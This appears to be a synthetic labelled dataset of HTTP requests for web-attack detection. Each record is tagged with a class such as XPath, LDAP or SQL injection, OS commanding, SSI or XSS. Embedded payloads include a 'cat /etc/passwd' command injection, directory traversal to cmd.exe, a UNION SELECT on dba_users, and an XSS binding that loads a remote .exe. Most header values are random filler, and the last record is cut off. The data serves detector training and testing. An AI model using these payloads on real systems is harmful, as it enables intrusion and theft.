Content-MD5: bmQxaWVlYW5lZW50b2JMVA==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 23 Dec 08 12:19:46 GMT
Last-Modified: Mon, 31 Jul 06 05:35:08 CET
Host: 32.71.130.130
Connection: keep-alive
Accept: image/*, audio/*, text/*
Accept-Charset: *
Accept-Encoding: *;q=0.6
Accept-Language: *
Cache-Control: waT4b='zl'
Client-ip: 182.0.7.148
Cookie: C@PhEwIPA=804;eeaaaum=sUpiFerhce2ntqJhRw;ami6=tlzioAlayoynrcpske
Cookie2: $Version="30"
Date: Fri, 10 Oct 08 18:58:33 CET
ETag: "8SIu.AFvTvU3KcHdVRD"
Expect: Nerh01=hehmt9
From: nfie@aaskkmo.com
If-Modified-Since: Sun, 16 Oct 05 11:50:51 UTC
If-Unmodified-Since: Sat, 10 Oct 09 07:06:07 GMT
If-Match: "i0lMN13R6YQQ4FIYKY"
If-None-Match: *
If-Range: *
Max-Forwards: 45
MIME-Version: 2.2
Pragma: rese='cOsc'
Proxy-Authorization: NTLM dG9ub1NydW50OUF5YWJudHluc3RhQnphaHB1d2l6dmFkaTRGdmlobnM=
Authorization: NTLM ZVNkNTFPaGFlb2FOcWo3ZWxycXF1bGhTbjMzYnRPNmc5aWt4bXBFSWVuY3dlb3Vu
Range: -49879
Referer: /buzpe/elll/mNoi3m9j.exe
TE: deflate,trailers,chunked
Trailer: Accept-Language
User-Agent: r3atMjll (ma2-L4; dHGBtQwOD)
UA-CPU: 68000
UA-Disp: 320,3937,32
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 2355x6440
Via: FTP/7.5 www.igeitv.png, 7.7 www.dtefhrhk.png
Transfer-Encoding: compress
Upgrade: nto/6.6, ero7er/3.3, Axmpf/2.4
Warning: 930 168.40.198.240 "aetrpi0rwwtHsS" 
X-Forwarded-For: 85.56.154.10
X-Serial-Number: 3067055271
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

attsrtsfsdtdsti=2268424&0afvxL=nVO89&e2smmo2e2c=pdSetosisv&H2NRVd=7&drlziehbu6ieg=5Juk9jM&me5tbvoa3hto='     OR 'tohnk3'     =    N'    

End - Id: 41377
Start - Id: 48841
class: XPathInjection
GET /kaccess_log3jbody53OTqeWSG/uetneekNw6Dbi/8msi/P6/sRAoKWj2rPInJe/5@FeZ/c6l1i0wra/pDNHIkeUkIcKv49D579i/nieyulti/ionitOsexoepl/dVaccepto3O6vDftp0.htm?yiobnettioHtji=%7Epr%5Ba%40IdgO%7E+incat2ho+%26&ehathen=30+++or+++count%28path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D%28%28i%2Bj%2Bk%2Bl%2B1%29%5D++++%7C+++++path%2Fchild%3A%3A*%28%29%5Bposition%28%29%3D%28k%2B1%29%5D%29%3D1++or+10040%3D HTTP/1.1
Host: 58.2.12.9
Connection: keep-alive
Accept: text/*;q=0.1
Accept-Charset: *
Accept-Encoding: gzip, deflate;q=0.0
Accept-Language: *
Cache-Control: no-transform
Client-ip: 232.170.36.208
Cookie: ds=154691665;argtekrereru4=lpassthru=r2soesooe
Cookie2: $Version="999"
Date: Sat, 30 Aug 08 02:24:57 UTC
ETag: "Gx4UstfDiJNRaQGH8X"
Expect: rrlahos
From: w2h3rar@tkko9pi.org
If-Modified-Since: Thu, 08 Apr 04 17:47:07 CET
If-Unmodified-Since: Wed, 11 Mar 09 14:52:48 CET
If-Match: *
If-None-Match: "MYK_W5h39RoLIMb"
If-Range: Sat, 07 May 05 01:17:23 UTC
Max-Forwards: 984
MIME-Version: 9.5
Pragma: no-cache
Proxy-Authorization: NTLM bmVpVHByZTAwRm5lZWNvZWIwc2hyU2pzQW5wZmV0cmVzZW9yZWFlZ2FPZXIw
Authorization: iuut ieiRnfr=Svncz
Range: 5-03627
Referer: http://www.ytrodt.uk/i5sarTsu/njsttbo/dlcsoie/gcwwfcd/esm4hgl.conf
TE: deflate;q=0.6
Trailer: Accept-Charset
User-Agent: Mozilla/3.0 (compatible; tcuTd3; Open BSD i386; 9Suet; iniHsnLu)
UA-CPU: StrongARM
UA-Disp: 5906,9544,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 0867x2824
Via: HFm5le/8.8 113.71.180.99, fst/2.5 183.140.81.118:0991, FTP/6.4 224.177.93.123
Transfer-Encoding: deflate
Upgrade: qdiue/5.0
Warning: 266 252.104.26.149 "9bdidtHc" "Thu, 01 Nov 07 22:00:30 GMT"
X-Forwarded-For: 239.247.179.124
X-Serial-Number: 177199337529573688
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 48841
Start - Id: 43304
class: OsCommanding
GET /d_/QKS5n0VQG/NP3QWrx_0R/m7frBy1Iaehloh/xxk8-RVmgvarQ/tiknsonnuadO6fx/5sslu/tpTrcruEr0rde3aiw.js?98em7tTtpsicu=iyeE&mhye4xs9Lnwko=nIe&asue3trc3=%250acat++++%250a+++++%2Fetc%2Fpasswd+++%250a&oo=25&oemb=5LR7GJ&eeaeb=pfrom&dN56oza=560435&ve4rah0=3778156437&lr=jeei4aeen&etBatff=42102150&PSSf=6tgwspassthruM8Tp&awesao=4 HTTP/1.0
Host: 171.72.176.123:33379
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: 2s09lOx-faehN;q=0.6, lsit-srb, esu-bs1iodhT, McEav-iIttIaa;q=0.3
Cache-Control: min-fresh=4066
Client-ip: 102.61.9.190
Cookie: fdUei=0Tk0AmFe;.mZASPE5=ld5ztctacbaped
Cookie2: $Version="7"
Date: Sun, 30 Jul 06 23:08:33 CET
ETag: "R9o82xN8kyAh79Fd2g"
Expect: 100-continue
From: ehhmnsme@ohym.uk
If-Modified-Since: Fri, 21 Dec 07 05:06:04 GMT
If-Unmodified-Since: Thu, 18 Feb 10 04:58:46 UTC
If-Match: "bo.nYMc.KHOEAqWVu"
If-None-Match: *
If-Range: Mon, 19 Sep 05 05:23:10 UTC
Max-Forwards: 7
MIME-Version: 0.7
Pragma: no-cache
Proxy-Authorization: Basic cDlzYVNpc3Q6cEZOZnIx
Authorization: Basic dnVvaXNudTpmcHQ3b2lHaA==
Range: -340027,1338-0
Referer: /Giehoaya/ptvo4e/qdoo/hseirrhy.sh
TE: trailers,chunked;q=0.3
Trailer: Cache-Control
User-Agent: Mozilla/9.9 (Machintosh; U; Mac OS X 6.0; wt-1t; rv:9.1.4) Gecko/55043778
UA-CPU: Sparc
UA-Disp: 260,218,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 3321x719
Via: 3.4 16.51.69.58, FTP/7.7 www.oeriltx.htm
Transfer-Encoding: compress
Upgrade: svhC/6.6, eeeovf/0.6, Rs9jj/2.4, inuc/6.8
Warning: 597 167.142.104.140 "ureioenlrkas6ps" 
X-Forwarded-For: 31.255.144.84
X-Serial-Number: 33268910997830583
----: ---------------
~~~~~: ~~~~~~~~~~

null

End - Id: 43304
Start - Id: 48911
class: XPathInjection
GET /aC/WOB3X/tiq/uOK8/mzL7wu3S9cJwnom/aS@v8lMS9/httpQs0stV/g0V0Tx.cgi?aw5ine=ntp+&aDthtsih=%3Bn%3B+&N3Od9dIA2=tasa&hEZ2iwindow.openhQ4K=7Sa0DZ&oAn6=ort&Teemiijaahnnr=%5CZobjecte&mlrmr6rntaihso=3JH7X0omMaSU&ecrcyeotka=t&HqD5zoCcyZ=hM68lqThy&BGFUKlXsock_streamM0O=9&aargnea=079&ie=4tzXOQQ6ooE&c8AsH=iuji%27+++or++++path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3DN%5D++++or++%27c5%27+%3D+%27 HTTP/1.1
Host: 243.19.124.219:80
Connection: abei
Accept: */*
Accept-Charset: euc-jp;q=0.2, iso-8859-5, big5;q=0.4, cp-950;q=0.1
Accept-Encoding: *
Accept-Language: ocle-noa, oonyFsAv-ngSs
Cache-Control: max-age=3
Client-ip: 27.145.34.50
Cookie: sa=rsree9stnDsEeedfI;ilX=4
Cookie2: $Version="504"
Date: Thu, 31 Jul 08 15:47:00 UTC
ETag: W/"DEMXpzK3ZKUSrwpqiv9"
Expect: alsrgDt=Ugteta;eyxh2
From: nui8@hgERemx.net
If-Modified-Since: Wed, 04 Oct 06 08:28:34 GMT
If-Unmodified-Since: Wed, 07 Apr 04 05:57:53 CET
If-Match: "T@_sxNfq59Hr3pi"
If-None-Match: "Mx5c7grfboP61gEoTKpR"
If-Range: *
Max-Forwards: 6796
MIME-Version: 0.9
Pragma: ss=Fsatx
Proxy-Authorization: Basic blRlaDBtazp0eGVrcDBpNg==
Authorization: NTLM ZWhlbWdiaWh0cWh4YWs5ZWVvOWVwcmR0YTBOdHkzZXQ1M2Vjcm9uQ2g4
Range: 87-22
Referer: http://laen.cz/tdfisP/mhbsa/sjbo/7Sfau/Eewupue.cgi
TE: gzip;q=0.7,trailers,gzip;q=0.4
Trailer: Warning
User-Agent: Mozilla/5.6 (X11; U; Linux i586 0.8; ed-sy; rv:1.2.2) Gecko/51382353
UA-CPU: PowerPC
UA-Disp: 8730,583,8
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 3997x7266
Via: HTTP/1.9 220.126.57.160, sel/7.7 www.p45ehwsb.jpg
Transfer-Encoding: deflate
Upgrade: ltr/8.5, jsTkgd/0.2
Warning: 099 www.eSitghtc.htm "2nttveexd" "Tue, 21 Sep 04 15:34:20 CET"
X-Forwarded-For: 1.220.148.94
X-Serial-Number: 566436568089581
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48911
Start - Id: 37218
class: LdapInjection
GET /f6/lpqQYZ/f.w/foudfltasdtt1ur2yO/odkM97c.aspx?dgtjiT6smtu=6%3Ae&dZlC7sW=vab&oDMdJL4Qt3.=%29++++%28++++%7C+%28displayName%3Dhad*%29++%28name+%3D++had*++%29%28mail%3Dhad*+++%29 HTTP/1.1
Host: 100.11.254.109
Connection: keep-alive
Accept: */*;q=0.3
Accept-Charset: *;q=0.4
Accept-Encoding: gzip;q=0.8
Accept-Language: *
Cache-Control: no-cache
Client-ip: 231.33.198.222
Cookie: p7Y1tvh=hbQNMgD@zOmb;batdo5iApsayes=4072
Cookie2: $Version="23"
Date: Sat, 15 Jan 05 17:02:47 GMT
ETag: W/"BUGMepBlU1pSOdhZi"
Expect: eesgne
From: hsosdtF@auonsc62n.be
If-Modified-Since: Sat, 23 May 09 24:42:34 UTC
If-Unmodified-Since: Sun, 25 Apr 10 23:03:03 GMT
If-Match: "WUclZDkjrH9trt3mOL"
If-None-Match: *
If-Range: Tue, 25 Nov 08 04:24:37 UTC
Max-Forwards: 2
MIME-Version: 2.4
Pragma: no-cache
Proxy-Authorization: NTLM b2Zlc3JlaWRlc3BpcHl0cnRvc2VzbXFoeWVuc2FpYWJ4RUJyVm50dGFlcnJ5OA==
Authorization: tnti rtr3=hloota
Range: 783-
Referer: /yttt.php4
TE: gzip,deflate;q=0.8
Trailer: Max-Forwards
User-Agent: RdinyeeAitLfazkd9r
UA-CPU: Sparc
UA-Disp: 4047,0109,8
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 0874x8291
Via: 2.6 www.etaffMy.shtml:479
Transfer-Encoding: deflate
Upgrade: cleeI/2.9, MCtE/0.6, Tse/6.1, rge/4.6, esEkld/2.9
Warning: 553 www.Nftmdh.html "rnvarnu59oDgV" "Mon, 31 Oct 05 08:57:55 UTC"
X-Forwarded-For: 217.7.45.94
X-Serial-Number: 973297601016037015
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37218
Start - Id: 37953
class: LdapInjection
GET /fLixmetaJPNetc/iTYuCAgxdf3QI/gf1meRZ5dZCdt/ETvdc@6oQx/d-hYyxTvrer9D8o/tsg42m/sibeuEi6eitee57lp4h/sfgdQ/iZnYUTnvrEmh9ZmKMU/jg8u8-27z0j-3/MwF/ttQgnnnR-Juzp0.gif?4ielNceq=u+%29creatg&rn4dmu=hou&q.AX0QYU8K=4598999&xatzavleaoo=sa%5D&TN4t=akO&VkNz64=53134290&fr9ypna=574%29%28%26%28objectClass%3Dild%29%28%7C%28sn+++%3D+++3e%29%28cn%3Dtp++J*%29%29&rnsrUlts=iTWUa5T-RY&lnstslefwehef=2629&eTrtnuj7uemelMo=en0toRoholokhA55 HTTP/1.1
Host: 106.11.139.77:21274
Connection: close
Accept: */*;q=0.1
Accept-Charset: x-mac-arabic;q=0.8, iso-8859-9, windows-874;q=0.6
Accept-Encoding: 
Accept-Language: t5tb-nsq6tqe, zrili-smce;q=0.1, Eth3-reON;q=0.1
Cache-Control: only-if-cached
Client-ip: 106.160.89.209
Cookie: zh=eSsaqWdr0y3  ;dnrnLwqqglaeet8=f zptaahsecowr;noesuAz=937263;Iebeii=woa;eiOintla4l=ed;atles=Hdnoanie
Cookie2: $Version="2"
Date: Mon, 25 Aug 08 03:17:15 CET
ETag: "Xry4eogdLPlMSdnufTwb"
Expect: psersns=esanan
From: nteal@6riIt.fr
If-Modified-Since: Wed, 28 Dec 05 07:26:40 UTC
If-Unmodified-Since: Tue, 30 Dec 08 20:19:26 UTC
If-Match: "LeDCK94XgF1M8SUM"
If-None-Match: *
If-Range: Sun, 21 Oct 07 20:06:21 UTC
Max-Forwards: 2
MIME-Version: 0.1
Pragma: no-cache
Proxy-Authorization: NTLM aXJoenJoN2NpbmdpZnJoY0t0bHNkZW9pc3lkaGI2ZGQ=
Authorization: Basic ODBkcm86dGxzaA==
Range: 03-,-49
Referer: /attrjet/fetn.shtml
TE: deflate;q=0.1
Trailer: Pragma
User-Agent: Mozilla/9.2 (Windows; U; WinNT 7.0; aa-9t; rv:4.0.7) Gecko/40345094
UA-CPU: Sparc
UA-Disp: 472,2226,8
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 8848x2681
Via: 3.4 227.238.161.80:3, 8.1 2.242.230.209
Transfer-Encoding: compress
Upgrade: spoM3/2.4, sus/6.4, cez/4.2
Warning: 209 www.aRtos.png "mgfiafudiih" 
X-Forwarded-For: 82.192.128.217
X-Serial-Number: 8812591
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37953
Start - Id: 50046
class: XPathInjection
PUT /ra4la5rbreall/eferkaeh7itIE/nCSsTZ/Gg.eJ/wJNEOW5_uq0Jalfx/2E2divF/mezeztbudtt/aepazoomlPtez/systemkI0.TQZWdOXo/eeisitiwdr.js? HTTP/1.1
Content-Length: 104
Content-Language: o8a
Content-Encoding: compress
Content-Location: /yEet/aJtJrr/o8cfirza/ztttef.gz
Content-MD5: bnRrbml0amt0ZGxEb280ZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 09 Oct 08 10:36:07 GMT
Last-Modified: Fri, 06 Jul 07 15:06:57 GMT
Host: 155.213.200.254
Connection: keep-alive
Accept: video/mpeg
Accept-Charset: x-mac-turkish;q=0.0
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-age=42
Client-ip: 156.140.221.238
Cookie: vAutr6iteo=s&aeaiterao;evalWLm=4195    or   count(path/child::node()[position()=((i+j+k+l+1)]  |     path/child::*()[position()=(k+1)])=1   or    924=;oog0=&:;aDNyymum=+s];sKaw=715;Z7QR=tjOoycJwjdZ
Cookie2: $Version="33"
Date: Wed, 29 Jun 05 02:26:17 UTC
ETag: W/"AIvtFc_W-7aHz.bg-93"
Expect: ziee=5mom;eeregi=eeeeil
From: hizpE@meYwOri.cz
If-Modified-Since: Wed, 25 Jul 07 12:03:17 UTC
If-Unmodified-Since: Fri, 03 Jun 05 10:04:16 GMT
If-Match: *
If-None-Match: "l_Mf98I1dqgiEjynHHB"
If-Range: *
Max-Forwards: 2822
Pragma: Qt=ructeese
Authorization: Digest nonce
Range: -59071,-7
Referer: /tgm1m.gz
TE: gzip;q=0.2
User-Agent: uein7okef/4.5.0
UA-CPU: Sparc
UA-OS: Linux
UA-Color: color32
Via: ytrh/7.3 161.223.98.214
Transfer-Encoding: identity
Upgrade: el5/5.9, toaEci/6.4, n64go3/0.8, nk1/2.4, emi/6.4
Warning: 391 www.na9as.tiff:4819 "aYsi2iAitso" "Mon, 25 May 09 17:22:02 UTC"
X-Serial-Number: 391471974667
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

v95Ucr=onwM&fS=1elhr4fmbc&agwcrhhavsat2cl=alibjDE&eqazUmt=sl3pGc&hds6ntfDO=body&enasOiosmheo=eJmWcRpKqi_

End - Id: 50046
Start - Id: 39331
class: SSI
GET /NQY9EuE/a6dpteuittCmiht/5erP01bp/fhser/lufTnvFTFt/eh/netcatuHTVtmp8like4K/tdaonirnd/cN8OO8Qd-fhtpassa.pl?ee5buxhdb=%3C%21--%23echo+var%3D%22date_gmt%22--%3E&rgdN=m0Ax HTTP/1.0
Host: 224.158.246.16
Connection: eWyi
Accept: */*;q=0.7
Accept-Charset: iso-8859-5;q=0.8, windows-1250;q=0.0, windows-1253, ks_c_5601-1987
Accept-Encoding: gzip;q=0.8, deflate;q=0.6
Accept-Language: oycpen-ve6A8, tllr-llc1h
Cache-Control: tieH='r5dsr'
Client-ip: 108.73.42.141
Cookie: odgoo=D1tfi;eeEn5xg2eSa=184788;ehr18=5869314189;rle= &Saoheh
Cookie2: $Version="998"
Date: Wed, 26 May 04 08:12:47 GMT
ETag: "JlPV01Vps_Aje@9LfsF"
Expect: 100-continue
From: fiaotu@eNeFi.it
If-Modified-Since: Sat, 06 Nov 04 01:33:26 UTC
If-Unmodified-Since: Thu, 23 Apr 09 02:09:14 UTC
If-Match: *
If-None-Match: *
If-Range: Fri, 19 Mar 10 23:09:39 CET
Max-Forwards: 985
MIME-Version: 5.7
Pragma: no-cache
Proxy-Authorization: NTLM dDF5cXlCY2FlcnMwZ3RveXJlbHQ4b0Vhc1R5cmhvaGFvaGU4c2Q=
Authorization: NTLM c2RBb3NidXRhNmFlVHJ3c2Vlc1V4aG1kZGV4cm9Fb2Vxcg==
Range: -7892
Referer: /OsTs/alaex.jsp
TE: trailers,trailers
Trailer: From
User-Agent: HUewruslle
UA-CPU: x86
UA-Disp: 593,4970,8
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 9132x248
Via: HTTP/6.0 123.127.180.111
Transfer-Encoding: deflate
Upgrade: hsyn/7.1
Warning: 603 www.gfjcoE2.gif "tntsi" "Thu, 02 Nov 06 09:59:58 UTC"
X-Forwarded-For: 135.206.207.129
X-Serial-Number: 802337450581
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39331
Start - Id: 35275
class: SqlInjection
GET /ksp/Tlh9tuiEres2/adtnltwmsmi5da3slw/tk5OBE1779IJEIn4V/eopsEegzgehie/s9ateegscnmagEoooh/hMYCPzrpILPh5yt_vaQx/twgor/iySh/aas.js?lrvdsceesh=shutdownsAb%3C2s%5DtI%3A&dtwrTnDhp=mrol+hcmdrge%27+otCtsinput&4hpyW=chairs%27++UN%2F**%2FION++++SEL%2F**%2FECT++ea++FROM+++++dba_users++WHERE+3drTdt++++like++++%27%2525&knet=3113&ioelgdha1ebii=7114779517&ta9Oi2xiann=243&ZtWpasswdHew=loggietc&noO5ed3ut=5ZInzNaoacrgBncg&oxniXd=+ba&senhueba1nLSYwc=8751&el1sbretrnn4=snGscr%27c HTTP/1.1
Host: www.rhm2tpnd.ch
Connection: keep-alive
Accept: text/*, video/quicktime
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.3
Cache-Control: max-stale=913
Client-ip: 155.132.155.102
Cookie: toT8hm=6083555
Cookie2: $Version="75"
Date: Sat, 28 Aug 04 24:34:38 CET
ETag: "bvEbhRuWJy1AnSCQb"
Expect: 100-continue
From: B9ir@tOlwn.gov
If-Modified-Since: Sun, 05 Sep 04 10:53:22 CET
If-Unmodified-Since: Sat, 17 Jan 09 05:11:25 UTC
If-Match: ".M9tQIMHGSKPZ0v"
If-None-Match: "M@lM3Gui-xmWYKigQ"
If-Range: Sun, 03 May 09 14:11:35 CET
Max-Forwards: 27
MIME-Version: 8.3
Pragma: ajr='elrosis7'
Proxy-Authorization: Digest cnonce="oCgves"
Authorization: Digest nc=2CdfbeAc
Range: 930-456,2355-
Referer: http://naeArn.be/ttiwfnni/sltisk.doc
TE: trailers
Trailer: Proxy-Authorization
User-Agent: hheyshrleme
UA-CPU: StrongARM
UA-Disp: 420,4746,32
UA-OS: Win98
UA-Color: color8
UA-Pixels: 827x876
Via: FTP/7.5 www.ac1art.jpeg, FTP/4.7 www.rancoo.shtml
Transfer-Encoding: identity
Upgrade: caha/7.7
Warning: 296 6.5.179.123 "hytu1eutoy" 
X-Forwarded-For: 162.78.14.7
X-Serial-Number: 045069362668
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 35275
Start - Id: 43722
class: OsCommanding
GET ..%%35c../..%%35c../..%35c../..%35c../winnt/system32/cmd.exe? HTTP/1.1
Host: www.7hgwa.net:7
Connection: keep-alive
Accept: image/png;q=0.6, video/quicktime
Accept-Charset: cp-936, ks_c_5601-1987, x-mac-turkish, x-mac-icelandic;q=0.3, us-ascii
Accept-Encoding: 
Accept-Language: *;q=0.7
Cache-Control: no-cache
Client-ip: 183.153.88.199
Cookie: ttsswo3Yiunbi=0230677;1ererttiro1w=tte&le&;mnoMe=io%utni;crmlCEhihftf=bRlSk;u8pd=643386
Cookie2: $Version="378"
Date: Thu, 30 Mar 06 16:25:26 CET
ETag: W/"3BJWUYYJ2ACJTUS@l"
Expect: 100-continue
From: uhbqiisi@rmieagr.org
If-Modified-Since: Mon, 26 Jan 09 15:58:05 GMT
If-Unmodified-Since: Sat, 22 Dec 07 22:22:47 UTC
If-Match: "6MjIJR6DEMj0ukCJPmRB"
If-None-Match: *
If-Range: *
Max-Forwards: 224
MIME-Version: 4.3
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: Basic aXp0aTphM3RMaXJ0
Range: 7008-71
Referer: /nusscbo/iY2sl4/o3wsns.php3
TE: gzip,deflate
User-Agent: henebl/8.9.5
UA-CPU: 68000
UA-Disp: 603,315,32
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 284x7393
Via: FTP/4.5 9.210.222.206:359
Transfer-Encoding: gzip
Upgrade: 2Ytn/5.0, a8qtt/0.1
Warning: 140 www.rnisshet.gif "tr2eit" 
X-Forwarded-For: 175.133.115.65
X-Serial-Number: 601406
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 43722
Start - Id: 37303
class: LdapInjection
POST /62/Lc6n8HLjtnJYechoh/j50a6ODg@uL2u9Cxh/2CuJTdiv0WroPJ@/oPsi1/bgZIvu9wLj6twfcLc/g5/t0m.swf? HTTP/1.1
Content-Length: 215
Content-Language: l,niahths,naid
Content-Encoding: identity
Content-Location: /sejfn.cgi
Content-MD5: cnljaGRuZW9ub2VkYWVCZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 06 May 06 19:06:06 CET
Last-Modified: Mon, 23 Jan 06 07:38:36 CET
Host: www.Rt6llst.com:80
Connection: close
Accept: video/*;q=0.6, text/*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.8
Cache-Control: no-cache
Client-ip: 218.131.77.230
Cookie: hdtcehriad=3oo(;aatt3e5n=)    (   |   (oats=cb*);rItr8i=ta;cpeletfao=qQ9O5;kperl7GfdocumentrzKstyleF=tctno
Date: Thu, 23 Mar 06 12:29:45 UTC
ETag: "DbKJMsm.TPdtnkkXao"
Expect: 100-continue
From: ea9sTse@dbeeM5an.org
If-Unmodified-Since: Tue, 21 Nov 06 21:25:59 GMT
If-Match: *
If-None-Match: "EKlvm@fHX5nwkW8NN96"
If-Range: Sun, 18 May 08 06:16:36 GMT
Max-Forwards: 339
MIME-Version: 8.8
Pragma: asdntarr='o'
Authorization: NTLM dm9tNXVtblJwYWFFZ29nenRaZTNlY2VhNXNhZW0xRWVPZm9BZWllaWo=
Referer: /ehE8/tttie5s.asmx
TE: chunked,deflate
User-Agent: anwSinotec (svEXja4we)
Via: 6.1 26.62.184.255, 4.9 106.87.16.237:9990, 1.3 www.OarirNaa.gif:89662
Transfer-Encoding: meweg

ibrntvxA=ionlike&tneey0ehesmno=[n&gdbec=ct&ls=d;rb&o0svoghE0eA=vLod2dhhmsacfawiar&unwruBmdrhzRnh=adtincluderedocumente|3mhlsr7eau&hcLyyshm=atg9hvelanrcHrf&jas1kmsrnf=3&LoQeu=n\&nwl=irew:o(tbik=5o2rdVnt

End - Id: 37303
Start - Id: 44521
class: OsCommanding
GET ..��../winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: 104.57.215.107
Connection: o7nrctsh
Accept: */*;q=0.3
Accept-Charset: x-mac-roman
Accept-Encoding: 
Accept-Language: *;q=0.9
Cache-Control: no-cache
Client-ip: 108.61.204.42
Cookie: Eadjaliet=e_uqTYYep;errndc9e=nVCKPxQ6OM;geH-RvR9=3567216;tfksitDnieRe=oJZ4kH05-h3
Cookie2: $Version="817"
Date: Mon, 23 May 05 04:34:20 CET
ETag: "6.58tUusJo7_pzi8ZM"
Expect: 100-continue
From: bsntalu@ofn3s.de
If-Modified-Since: Sat, 16 Apr 05 13:06:37 UTC
If-Unmodified-Since: Tue, 22 Feb 05 09:31:00 GMT
If-Match: "OYpkBKwDqtc@BqL"
If-None-Match: *
If-Range: *
Max-Forwards: 89
MIME-Version: 8.5
Pragma: iitshoiw='uae'
Proxy-Authorization: NTLM dzRtb3JPZWRyZ2FlSVNwVWRpTG5hbWNvZXRjc2F0YkFhdXk3dXZj
Authorization: ienbeh ieerread=snqackgo
Range: 0-753213
Referer: http://www.sl22gubs.fr/cest/Get6afa/rdsc1e/g1om.swf
TE: trailers
Trailer: Warning
User-Agent: Mozilla/6.0 (compatible; onrrn0nn; Win 9x; ilnatestmi; iCcelc; rSgo5slp)
UA-CPU: PowerPC
UA-Disp: 170,4014,32
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 455x841
Via: HTTP/3.4 184.233.61.225, HTTP/2.8 195.249.94.183, 6.1 158.244.173.94
Transfer-Encoding: deflate
Upgrade: c3oe/1.8, sib/4.3, apenZ/1.3
Warning: 068 www.btrdkgr.jpg "Eisnha2tHnadpch3np" 
X-Forwarded-For: 106.107.95.22
X-Serial-Number: 80317009323381424111
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44521
Start - Id: 46615
class: XSS
GET /TxrAa/wtethciqneeb6Nar/yOuu93Gj.qrUMqln3lli/eAfsb/gk/rmeetqndaeutt1lO6a.php3?eos74rexduqo=7707358536&mqiaposl=bf%40&mBiFvCwPZL=15265&AdolFmsdns=wioui&rmi=8rdh995meun&xETfromQ9TYphpe6=%26-%3B%5C&rttaianOt=adsHMPv3mE3_&Eouleewt=%3Eieem&uaofll=29&KFWNn5vypasswd=75725&nGiTT32usut=aXs2I&hrHoahiara=%27og&teri2lemloeNe6r=63&dcdnrseraaj=4338931904 HTTP/1.0
Host: www.asotoAnyr.fr
Connection: keep-alive
Accept: */*
Accept-Charset: macintosh;q=0.5, iso-8859-8;q=0.8, utf-8;q=0.1, windows-874, iso-8859-4;q=0.7
Accept-Encoding: compress, identity
Accept-Language: <div     style    =   "   binding:     url([http://www.st.com/script/O7yce6j.exe]);"  >
Cache-Control: max-stale=3699
Client-ip: 233.110.114.178
Cookie: g6aocn=3304725;atitasbejitvh=efuleze9hpben;eyncb=pinsa;n76iEpt1eea1r=4415528938
Cookie2: $Version="976"
Date: Tue, 18 Oct 05 10:08:45 GMT
ETag: "_ek5GFvMhnXVSDU6b"
Expect: 100-continue
From: itwrt@4wirn.uk
If-Modified-Since: Sat, 25 Jul 09 12:14:04 CET
If-Unmodified-Since: Mon, 09 Aug 04 16:04:15 UTC
If-Match: "b-FuryhPv9jU2pMW"
If-None-Match: "grUO5_hx8oA562b"
If-Range: *
Max-Forwards: 438
MIME-Version: 3.6
Pragma: sadt=0wsoOt
Proxy-Authorization: 1cesn etzgcum=3f2cr
Authorization: 7rxig eeii=nrynliaz
Range: 7283-8
Referer: /d7ntetlp/tgeotus/e9dnpIa.jpg
TE: gzip,gzip;q=0.4,gzip;q=0.8
Trailer: Cache-Control
User-Agent: har67etsa (rtVurEx; sddxBfP5; hvnqUzWskM; hvco2d; vmM_h8FvC)
UA-CPU: PowerPC
UA-Disp: 7714,181,32
UA-OS: Win95
UA-Color: color8
UA-Pixels: 950x529
Via: FTP/0.1 www.eHht.png:3642, 2.2 www.aCdis.tiff
Transfer-Encoding: deflate
Upgrade: 1ssnt/2.7, Necil/0.4
Warning: 749 169.197.175.54 "aTaul8Deeyii" "Wed, 21 Apr 04 19:11:25 GMT"
X-Forwarded-For: 245.134.55.175
X-Serial-Number: 24556
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46615
Start - Id: 48505
class: XPathInjection
PUT /iz.css? HTTP/1.0
Content-Length: 249
Content-Language: bEiabmr,mtmllsIs,1dsa
Content-Encoding: compress
Content-Location: http://www.Uaog.uk/n6qudibx.tiff
Content-MD5: bmhvbnkyNXRsaEhucnllZw==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 01 Nov 09 03:20:28 CET
Last-Modified: Thu, 04 Oct 07 06:37:28 GMT
Host: www.egsr6mt6.be
Connection: un4ipjc
Accept: text/*
Accept-Charset: x-mac-ce
Accept-Encoding: deflate, gzip
Accept-Language: *;q=0.2
Cache-Control: only-if-cached
Client-ip: 117.212.24.161
